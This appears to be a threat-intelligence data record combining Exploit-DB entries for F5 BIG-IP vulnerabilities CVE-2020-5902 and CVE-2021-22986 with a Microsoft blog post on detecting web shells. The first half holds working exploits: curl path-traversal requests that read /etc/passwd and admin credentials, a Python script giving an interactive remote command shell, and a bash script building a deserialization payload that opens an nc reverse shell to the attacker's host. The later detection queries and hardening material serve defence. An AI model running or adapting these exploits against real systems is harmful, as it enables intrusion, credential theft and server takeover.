"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-05T00:00:00", "type": "exploitdb", "title": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-05T00:00:00", "id": "EDB-ID:48643", "href": "https://www.exploit-db.com/exploits/48643", "sourceData": "## RCE: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'\r\n\r\n## Read File: \r\n\r\ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'", "sourceHref": "https://www.exploit-db.com/download/48643", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T06:05:12", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-02T00:00:00", "type": "exploitdb", "title": "F5 BIG-IP 
16.0.x - iControl REST Remote Code Execution (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-22986", "CVE-2021-22986"], "modified": "2021-04-02T00:00:00", "id": "EDB-ID:49738", "href": "https://www.exploit-db.com/exploits/49738", "sourceData": "# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)\r\n# Exploit Author: Al1ex\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2\r\n# CVE : CVE-2021-22986\r\n\r\nimport requests\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nimport sys\r\n\r\n\r\ndef title():\r\n print('''\r\n ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ \r\n / |\\ \\ / / | ____| |__ \\ / _ \\ |__ \\ /_ | |__ \\ |__ \\ / _ \\ / _ \\ / / \r\n | ,----' \\ \\/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ \r\n | | \\ / | __| |______/ / | | | | / / | | |______/ / / / \\__, | > _ < | '_ \\ \r\n | `----. 
\\ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \r\n \\______| \\__/ |_______| |____| \\___/ |____| |_| |____| |____| /_/ \\___/ \\___/ \r\n \r\n Author:Al1ex@Heptagram\r\n Github:https://github.com/Al1ex\r\n ''') \r\n\r\ndef exploit(url):\r\n\ttarget_url = url + '/mgmt/shared/authn/login'\r\n\tdata = {\r\n\t\t\"bigipAuthCookie\":\"\",\r\n\t\t\"username\":\"admin\",\r\n\t\t\"loginReference\":{\"link\":\"/shared/gossip\"},\r\n\t\t\"userReference\":{\"link\":\"https://localhost/mgmt/shared/authz/users/admin\"}\r\n\t}\r\n\theaders = {\r\n\t\t\"User-Agent\": \"hello-world\",\r\n\t\t\"Content-Type\":\"application/x-www-form-urlencoded\"\r\n\t}\r\n\tresponse = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)\r\n\tif \"/mgmt/shared/authz/tokens/\" not in response.text:\r\n\t\tprint('(-) Get token fail !!!')\r\n\t\tprint('(*) Tested Method 2:') \r\n\t\theader_2 = {\r\n\t\t 'User-Agent': 'hello-world',\r\n\t\t 'Content-Type': 'application/json',\r\n\t\t 'X-F5-Auth-Token': '',\r\n\t\t 'Authorization': 'Basic YWRtaW46QVNhc1M='\r\n\t\t}\r\n\t\tdata_2 = {\r\n\t\t\t\"command\": \"run\", \r\n\t\t\t\"utilCmdArgs\": \"-c whoami\"\r\n\t\t}\r\n\t\tcheck_url = url + '/mgmt/tm/util/bash'\r\n\t\ttry:\r\n\t\t\tresponse2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)\r\n\t\t\tif response2.status_code == 200 and 'commandResult' in response2.text:\r\n\t\t\t\twhile True:\r\n\t\t\t\t\tcmd = input(\"(:CMD)> \")\r\n\t\t\t\t\tdata_3 = {\"command\": \"run\", \"utilCmdArgs\": \"-c '%s'\"%(cmd)}\r\n\t\t\t\t\tr = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)\r\n\t\t\t\t\tif r.status_code == 200 and 'commandResult' in r.text:\r\n\t\t\t\t\t\tprint(r.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))\r\n\t\t\telse:\r\n\t\t\t\tprint('(-) Not vuln...')\r\n\t\t\t\texit(0)\r\n\t\texcept Exception:\r\n\t\t\tprint('ERROR Connect')\r\n\tprint('(+) Extract token: 
%s'%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0]))\r\n\twhile True:\r\n\t\tcmd = input(\"(:CMD)> \")\r\n\t\theaders = {\r\n\t\t\t\"Content-Type\": \"application/json\",\r\n\t\t\t\"X-F5-Auth-Token\": \"%s\"%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0])\r\n\t\t}\r\n\t\tdata_json = {\r\n\t\t\t\"command\": \"run\", \r\n\t\t\t\"utilCmdArgs\": \"-c \\'%s\\'\"%(cmd)\r\n\t\t}\r\n\t\texp_url= url + '/mgmt/tm/util/bash'\r\n\t\texp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)\r\n\t\tif exp_req.status_code == 200 and 'commandResult' in exp_req.text:\r\n\t\t\tprint(exp_req.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))\r\n\t\telse:\r\n\t\t\tprint('(-) Not vuln...')\r\n\t\t\texit(0)\r\n\r\nif __name__ == '__main__':\r\n title()\r\n if(len(sys.argv) < 2):\r\n \tprint('[+] USAGE: python3 %s https://<target_url>\\n'%(sys.argv[0]))\r\n \texit(0)\r\n else:\r\n \texploit(sys.argv[1])", "sourceHref": "https://www.exploit-db.com/download/49738", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T04:10:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T00:00:00", "type": "exploitdb", "title": "BIG-IP 15.0.0 < 15.1.0.3 / 14.1.0 < 14.1.2.5 / 13.1.0 < 13.1.3.3 / 12.1.0 < 12.1.5.1 / 11.6.1 < 11.6.5.1 - Traffic Management User Interface 'TMUI' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-5902", "CVE-2020-5902"], "modified": "2020-07-06T00:00:00", "id": "EDB-ID:48642", "href": "https://www.exploit-db.com/exploits/48642", "sourceData": "#!/bin/bash\r\n#\r\n# EDB Note Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48642.zip\r\n# \r\n# Exploit Title: F5 BIG-IP Remote Code Execution\r\n# Date: 2020-07-06\r\n# Exploit Authors: Charles Dardaman of Critical Start, TeamARES\r\n# Rich Mirch of Critical Start, TeamARES\r\n# CVE: CVE-2020-5902\r\n#\r\n# Requirements:\r\n# Java JDK\r\n# hsqldb.jar 1.8\r\n# ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar\r\n#\r\n\r\nif [[ $# -ne 3 ]]\r\nthen\r\n echo\r\n echo \"Usage: $(basename $0) <server> <localip> <localport>\"\r\n echo\r\n exit 1\r\nfi\r\n\r\nserver=${1?hostname argument required}\r\nlocalip=${2?Locaip argument required}\r\nport=${3?Port argument required}\r\n\r\nif [[ ! -f $server.der ]]\r\nthen\r\n echo \"$server.der does not exist - extracting cert\"\r\n openssl s_client \\\r\n -showcerts \\\r\n -servername $server \\\r\n -connect $server:443 </dev/null 2>/dev/null | openssl x509 -outform DER >$server.der\r\n\r\n keytool -import \\\r\n -alias $server \\\r\n -keystore keystore \\\r\n -storepass changeit \\\r\n -noprompt \\\r\n -file $PWD/$server.der\r\nelse\r\n echo \"$server.der already exists. 
skipping extraction step\"\r\nfi\r\n\r\njava -jar ysoserial-master-SNAPSHOT.jar \\\r\n CommonsCollections6 \\\r\n \"/bin/nc -e /bin/bash $localip $port\" > nc.class\r\n\r\nxxd -p nc.class | xargs | sed -e 's/ //g' | dd conv=ucase 2>/dev/null > payload.hex\r\n\r\nif [[ ! -f f5RCE.class ]]\r\nthen\r\n echo \"Building exploit\"\r\n javac -cp hsqldb.jar f5RCE.java\r\nfi\r\n\r\njava -cp hsqldb.jar:. \\\r\n -Djavax.net.ssl.trustStore=keystore \\\r\n -Djavax.net.ssl.trustStorePassword=changeit \\\r\n f5RCE $server payload.hex", "sourceHref": "https://www.exploit-db.com/download/48642", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T06:06:46", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-26T00:00:00", "type": "exploitdb", "title": "F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-5902", "CVE-2020-5902"], "modified": "2020-07-26T00:00:00", "id": "EDB-ID:48711", "href": "https://www.exploit-db.com/exploits/48711", "sourceData": "# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - 
Local File Inclusion\r\n# Date: 2019-08-17\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: <= 13.1.3\r\n# Tested on: BIG-IP 13.1.3 Build 0.0.6\r\n# CVE : CVE-2020-5902\r\n\r\n#!/usr/bin/env python\r\n\r\nimport requests\r\nimport sys\r\nimport time\r\nimport urllib3\r\nimport json \r\nurllib3.disable_warnings()\r\n\r\nglobal target\r\n\r\ndef checkTarget():\r\n\r\n r = requests.head(target + \"/tmui/login.jsp\", verify=False)\r\n if(r.status_code == 200):\r\n return True\r\n else:\r\n return False\r\n\r\ndef checkVuln():\r\n\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0):\r\n return True \r\n else:\r\n return False\r\n\r\n else:\r\n return False\r\n\r\ndef leakPasswd():\r\n print(\"[+] Leaking /etc/passwd from server\")\r\n time.sleep(2)\r\n exploit('/etc/passwd')\r\n\r\n\r\ndef leakHosts():\r\n print(\"[+] Leaking /etc/hosts from server\")\r\n time.sleep(2)\r\n exploit('/etc/hosts')\r\n\r\ndef leakLicence():\r\n\r\n print(\"[+] Leaking /config/bigip.license from server\")\r\n time.sleep(2)\r\n exploit('/config/bigip.license')\r\n\r\ndef leakAdmin():\r\n\r\n print(\"[+] Leaking admin credentials from server\")\r\n time.sleep(2)\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0 ):\r\n print(data['output'])\r\n else:\r\n print(\"[X] Admin credentials not found\")\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\n\r\ndef exploit(file):\r\n \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=\" + file, verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n 
print(data['output'])\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\ndef memoryLeak():\r\n print(\"[!] Leaking tomcat process from server\")\r\n time.sleep(2) \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline\", verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n if(len(data['output'])>0):\r\n print(\"Command: \" + data['output'])\r\n\r\ndef main(host):\r\n\r\n print(\"[+] Check target...\")\r\n global target\r\n target = \"https://\" + host\r\n\r\n check = checkTarget()\r\n if(check):\r\n print(\"[~] Target is available\")\r\n\r\n vuln = checkVuln()\r\n if(vuln):\r\n print(\"[+] Target is vulnerable!\")\r\n\r\n time.sleep(1)\r\n print(\"[~] Leak information from target!\")\r\n time.sleep(1)\r\n leakPasswd()\r\n leakHosts()\r\n leakLicence()\r\n leakAdmin()\r\n memoryLeak()\r\n else:\r\n print(\"[X] Target is't vulnerable\")\r\n\r\n else:\r\n print(\"[x] Target is unavailable\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if(len(sys.argv) < 2):\r\n print(\"Use: python {} ip/dns\".format(sys.argv[0]))\r\n else:\r\n host = sys.argv[1]\r\n main(host)", "sourceHref": "https://www.exploit-db.com/download/48711", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2021-02-11T17:27:09", "description": "One year ago, we reported the steady increase in the use of web shells in attacks worldwide. The latest Microsoft 365 Defender data shows that this trend not only continued, it accelerated: every month from August 2020 to January 2021, we registered an average of 140,000 encounters of these threats on servers, almost double the 77,000 monthly average we [saw last year](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>).\n\n\n\n_Figure 1. 
Web shell encounters on servers_\n\nThe escalating prevalence of web shells may be attributed to how simple and effective they can be for attackers. A web shell is typically a small piece of malicious code, written in a language commonly used for web development (e.g., ASP, PHP, JSP), that attackers implant on web servers to provide remote access and code execution to server functions. Web shells allow attackers to run commands on servers to steal data or use the server as a launchpad for other activities like credential theft, lateral movement, deployment of additional payloads, or hands-on-keyboard activity, while allowing attackers to persist in an affected organization.\n\nAs web shells are increasingly common in attacks, both commodity and targeted, we continue to monitor and investigate this trend to ensure customers are protected. In this blog, we will discuss challenges in detecting web shells, and the Microsoft technologies and investigation tools available today that organizations can use to defend against these threats. We will also share guidance for hardening networks against web shell attacks.\n\n## Web shells as entry point for attacks\n\nAttackers install web shells on servers by taking advantage of security gaps, typically vulnerabilities in web applications, in internet-facing servers. These attackers scan the internet, often using public scanning interfaces like [shodan.io](<https://www.shodan.io/>), to locate servers to target. They may use previously fixed vulnerabilities that unfortunately remain unpatched in many servers, but they are also known to quickly take advantage of newly disclosed vulnerabilities.\n\nFor example, on June 30, 2020, F5 Networks released a patch for CVE-2020-5902, a remote code execution (RCE) vulnerability in the Traffic Management User Interface (TMUI). The vulnerability is a [directory traversal bug](<https://owasp.org/www-community/attacks/Path_Traversal>) with a CVSS score of 9.8 out of a possible 10. 
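The traversal primitive behind that bug, and the `..;` trick the public exploit above relies on, as an added illustration that is not part of the Microsoft post and is not F5's or Apache's code: a constructed Python model of a front-end access check that prefix-matches the raw URI, beside a servlet-container-style resolver that strips `;` path parameters from each segment and then collapses `..`, with a hardened check that canonicalises before matching. The allowed prefix, the two-stage pipeline and the paths are assumptions for the model; the payload's segment layout is simplified relative to the real exploit so that a single `..` lands on the sensitive JSP, and the exact httpd/Tomcat mapping on a BIG-IP is not modelled.

```python
import posixpath

# Constructed model of a front-end proxy plus a Tomcat-style servlet
# container. Not F5's configuration; prefixes and paths are assumptions.

# Prefix the front end serves without authentication (model assumption).
PUBLIC_PREFIXES = ("/tmui/login.jsp",)


def strip_path_parameters(path: str) -> str:
    """Drop ';name=value' path parameters from every segment, as a servlet
    container does before mapping the request to a servlet or JSP."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def backend_resolve(raw_uri: str) -> str:
    """What the container actually dispatches: query removed, path
    parameters stripped, then '.' and '..' segments collapsed."""
    path = raw_uri.split("?", 1)[0] or "/"
    resolved = posixpath.normpath(strip_path_parameters(path))
    return resolved if resolved.startswith("/") else "/" + resolved


def front_end_allows(raw_uri: str) -> bool:
    """Vulnerable access check: prefix-matches the raw URI. The segment
    '..;' is not a bare '..', so the front end sees no traversal."""
    path = raw_uri.split("?", 1)[0]
    return path.startswith(PUBLIC_PREFIXES)


def front_end_allows_fixed(raw_uri: str) -> bool:
    """Hardened check: canonicalise the way the backend will, refuse any
    URI that changes under canonicalisation or carries path parameters,
    then prefix-match the canonical form."""
    path = raw_uri.split("?", 1)[0]
    if ";" in path or backend_resolve(path) != path:
        return False
    return path.startswith(PUBLIC_PREFIXES)


def unauthenticated_dispatch(raw_uri: str, check) -> str:
    """Resource the backend serves to an unauthenticated client under the
    given front-end check, or 'DENIED'."""
    return backend_resolve(raw_uri) if check(raw_uri) else "DENIED"


if __name__ == "__main__":
    # Constructed payload in the style of the exploit above (simplified layout).
    payload = "/tmui/login.jsp/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
    print(unauthenticated_dispatch(payload, front_end_allows))        # reaches fileRead.jsp
    print(unauthenticated_dispatch(payload, front_end_allows_fixed))  # DENIED
```

The defensive point is the one the fixed check makes: an authorisation decision taken on a path string is only sound if the component that takes it canonicalises the path exactly as the component that dispatches it does, and the cheapest way to get there is to reject anything that changes under canonicalisation.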
Just four days later, on July 4, exploit code was added to a Metasploit module.\n\n\n\n_Figure 2. CVE-2020-5902 exploit code_\n\nThe following day, Microsoft researchers started seeing the exploit being used by attackers to upload a web shell to vulnerable servers. The web shell was used to run common cryptocurrency miners. In the days that followed, industry security researchers saw the exploit being broadly used to deploy web shells, with multiple variants surfacing not long after.\n\nThis incident demonstrates the importance of keeping servers up to date and hardened against web shell attacks. Web servers are frequently accessible from the internet and can be used by attackers to gain access to a network.\n\n## Web shells as persistence mechanisms\n\nOnce installed on a server, web shells serve as one of the most effective means of persistence in an enterprise. We frequently see cases where web shells are used solely as a persistence mechanism. Web shells guarantee that a backdoor exists in a compromised network, because an attacker leaves a malicious implant after establishing an initial foothold on a server. If left undetected, web shells provide a way for attackers to continue to gather data from and monetize the networks that they have access to.\n\nCompromise recovery cannot be successful and enduring without locating and removing attacker persistence mechanisms. And while rebuilding a single compromised system is a great solution, restoring existing assets is the only feasible option for many. So, finding and removing all backdoors is a critical aspect of compromise recovery.\n\nAnd this brings us back to the challenge of web shell detection. As we mentioned earlier, web shells can be generalized as a means of executing arbitrary attacker input by way of an implant. The first challenge is dealing with just how many ways an attacker can execute code. 
Web applications support a great array of languages and frameworks and, thus, provide a high degree of flexibility and compatibility that attackers take advantage of.\n\nIn addition, the volume of network traffic plus the usual noise of constant internet attacks means that targeted traffic aimed at a web server can blend right in, making detection of web shells a lot harder and requiring advanced behavior-based detections that can identify and stop malicious activities that hide in plain sight.\n\n## Challenges in detecting web shells\n\nWeb shells can be built using any of several languages that are popular with web applications. Within each language, there are several means of executing arbitrary commands and there are multiple means for arbitrary attacker input. Attackers can also hide instructions in the user agent string or any of the parameters that get passed during a web server/client exchange.\n\nAttackers combine all these options into just a couple of bytes to produce a web shell, for example:\n\n\n\n_Figure 3. Example of web shell code_\n\nIn the example above, the only readable word in the web shell is \u201ceval\u201d, which can be easy to miss or misinterpret. When analyzing script, it is important to leverage contextual clues. For example, a scheduled task called \u201cUpdate Google\u201d that downloads and runs code from a suspicious website should be inspected more closely.\n\nWith web shells, analyzing context can be a challenge because the context is not clear until the shell is used. In the following code, the most useful clues are \u201csystem\u201d and \u201ccat /etc/passwd\u201d, but they do not appear until the attacker interacts with the web shell:\n\n\n\n_Figure 4. Another example of web shell code_\n\nAnother challenge in detecting web shells is uncovering intent. A harmless-seeming script can be malicious depending on intent. 
But when attackers can upload arbitrary input files in the web directory, then they can upload a full-featured web shell that allows arbitrary code execution\u2014which some very simple web shells do.\n\nThese file-upload web shells are simple, lightweight, and easily overlooked because they cannot execute attacker commands on their own. Instead, they can only upload files, such as full-featured web shells, onto web servers. Because of their simplicity, they are difficult to detect and can be dismissed as benign, and so they are often used by attackers for persistence or for early stages of exploitation.\n\nFinally, attackers are known to hide web shells in non-executable file formats, such as media files. Web servers configured to execute server-side code create additional challenges for detecting web shells, because on a web server, a media file is scanned for server-side execution instructions. Attackers can hide web shell scripts within a photo and upload it to a web server. When this file is loaded and analyzed on a workstation, the photo is harmless. But when a web browser asks a server for this file, malicious code executes server side.\n\nThese challenges in detecting web shells contribute to their increasing popularity as an attack tool. We constantly monitor how these evasive threats are utilized in cyberattacks, and we continue to improve protections. In the next section, we discuss how behavior-based detection technologies help us protect customers from web shell attacks.\n\n## How Microsoft helps defend networks against web shell attacks\n\nGaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. To tackle challenges in detecting these threats, [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) uses a combination of durable protections that prevent web shell installation and behavior-based detections that identify related malicious activity. 
Microsoft Defender for Endpoint exposes malicious behavior by analyzing script file writes and process executions. Due to the nature of web shells, static analysis alone is not effective\u2014as we have shown, it is relatively easy to modify web shells and bypass static protections. To effectively deliver protection, Microsoft Defender for Endpoint uses multiple layers of protection through behavior inspection.\n\n[Behavior-based blocking and containment capabilities](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/behavioral-blocking-containment>), which use engines that specialize in detecting threats by analyzing behavior, monitor web-accessible directories for any new script file creation. While file creation events alone cannot be treated as suspicious, correlating such events with the responsible process tree can yield more reliable signals and surface malicious attempts. The engine can then remediate the script, neutralizing the primary infection vector. For example, an IIS instance (_w3wp.exe_) running suspicious processes such as \u2018_cmd.exe /c echo\u2019_, \u2018_certutil.exe\u2019_, or \u2018_powershell.exe\u2019_ that result in the creation of script files in web-accessible folders is a rare event and is, thus, typically a strong sign of web server compromise and web shell installation.\n\n\n\n\n\nMicrosoft Defender for Endpoint also detects web shell installation attempts originating from remote systems within the organization using various lateral movement methods. For example, attackers have been observed to drop web shells through Windows Remote Management (WinRM) or use existing Windows commands to transfer web shells over SMB. On the web server, these remote actions are carried out by system processes, thus giving visibility into the process tree. 
A system-privilege process dropping script files is another suspicious event and gives the behavior inspection engines a way to remediate the script before the attackers can perform any malicious actions.\n\n\n\n\n\nBehavior-based protection also provides post-compromise defense in scenarios where attackers are already operating and running commands on web servers. Once attackers gain access to a server, one of their first steps is to understand the privilege and the environment they have access to by using built-in reconnaissance commands that are not typically used by web applications. An IIS instance (_w3wp.exe_) running commands like _\u2018net\u2019_, _\u2018whoami\u2019_, _\u2018dir\u2019_, _\u2018cmd.exe\u2019_, or _\u2018query\u2019_, to name a few, is typically a strong early indicator of web shell activity.\n\nIIS servers have built-in management tools used by administrators to perform various maintenance tasks. These platforms surface various PowerShell cmdlets that can expose critical information to attackers. IIS instances (_w3wp.exe_) that host web-facing client services such as Outlook on the web (formerly known as Outlook Web App or OWA) or the Exchange admin center (EAC; formerly known as the Exchange Control Panel or ECP) accessing the management platform or executing the cmdlets shown below is suspicious activity and signifies a hands-on-keyboard attack. The behavior engine monitors execution of such cmdlets and the responsible process trees, for example:\n\n\n\nWith its behavior-based blocking and containment capabilities, Microsoft Defender for Endpoint can identify and stop behavior associated with web shell attacks. It raises alerts for these detections, enabling security operations teams to use the rich investigation tools in Microsoft Defender for Endpoint to perform additional investigation and hunting for related or similar threats.\n\n\n\n\n\n_Figure 5. 
Microsoft Defender for Endpoint alerts for behaviors related to web shell attacks_\n\nMicrosoft 365 Defender and Microsoft Defender for Endpoint customers can also run advanced hunting queries to proactively hunt for web shell attacks:\n\nLook for suspicious processes that the IIS worker process (_w3wp.exe_), Apache HTTP Server processes (_httpd.exe_, _visualsvnserver.exe_), and similar web server processes do not typically initiate (e.g., _cmd.exe_ and _powershell.exe_). The query matches the web server on the initiating process command line and excludes the compilers and FastCGI workers that ASP.NET and PHP hosts legitimately launch:\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_any(\"beasvc.exe\",\"coldfusion.exe\",\"httpd.exe\",\"owstimer.exe\",\"visualsvnserver.exe\",\"w3wp.exe\") or InitiatingProcessCommandLine contains 'tomcat'\n | where FileName != \"csc.exe\" // exclude csharp compiler\n | where FileName != \"php-cgi.exe\" //exclude php group, fast cgi\n | where FileName != \"vbc.exe\" //exclude Visual Basic Command Line Compiler\n | summarize by FileName\n\nLook for suspicious web shell execution. This query returns the children of a shell (_cmd.exe_ or PowerShell) whose parent is a web server process, which is where remote execution and reconnaissance activity shows up (examples: \"arp\", \"certutil\", \"cmd\", \"echo\", \"ipconfig\", \"gpresult\", \"hostname\", \"net\", \"netstat\", \"nltest\", \"nslookup\", \"ping\", \"powershell\", \"psexec\", \"qwinsta\", \"route\", \"systeminfo\", \"tasklist\", \"wget\", \"whoami\", \"wmic\", etc.):\n \n \n DeviceProcessEvents\n | where InitiatingProcessParentFileName in~(\"beasvc.exe\",\"coldfusion.exe\",\"httpd.exe\",\"owstimer.exe\",\"visualsvnserver.exe\",\"w3wp.exe\") or InitiatingProcessParentFileName startswith \"tomcat\"\n | where InitiatingProcessFileName in~(\"powershell.exe\",\"powershell_ise.exe\",\"cmd.exe\")\n | where FileName != 'conhost.exe'\n\n## Hardening servers against web shells\n\nA single web shell allowing attackers to remotely run commands on a server can have far-reaching consequences. With script-based malware, however, everything eventually funnels to a few natural chokepoints, such as _cmd.exe_, _powershell.exe_, and _cscript.exe_. 
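The two hunting queries above, re-expressed as an added Python example (not part of the Microsoft post and not Microsoft's code) so the logic can be exercised offline on a handful of constructed process-creation records. The field names mirror the `DeviceProcessEvents` columns the KQL uses; the `ProcessEvent` class, the recon command list and the sample events are assumptions constructed for this illustration, not real telemetry.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Added example: the two advanced-hunting queries re-expressed as a Python
# pass over process-creation records. Sample events are constructed.

WEB_SERVER_PROCESSES = {"beasvc.exe", "coldfusion.exe", "httpd.exe",
                        "owstimer.exe", "visualsvnserver.exe", "w3wp.exe"}
# Compilers and FastCGI workers that ASP.NET/PHP hosts launch legitimately;
# the first query excludes them to cut noise.
BENIGN_CHILDREN = {"csc.exe", "php-cgi.exe", "vbc.exe"}
SHELLS = {"powershell.exe", "powershell_ise.exe", "cmd.exe"}
# Built-in reconnaissance tooling from the list above (assumed .exe names).
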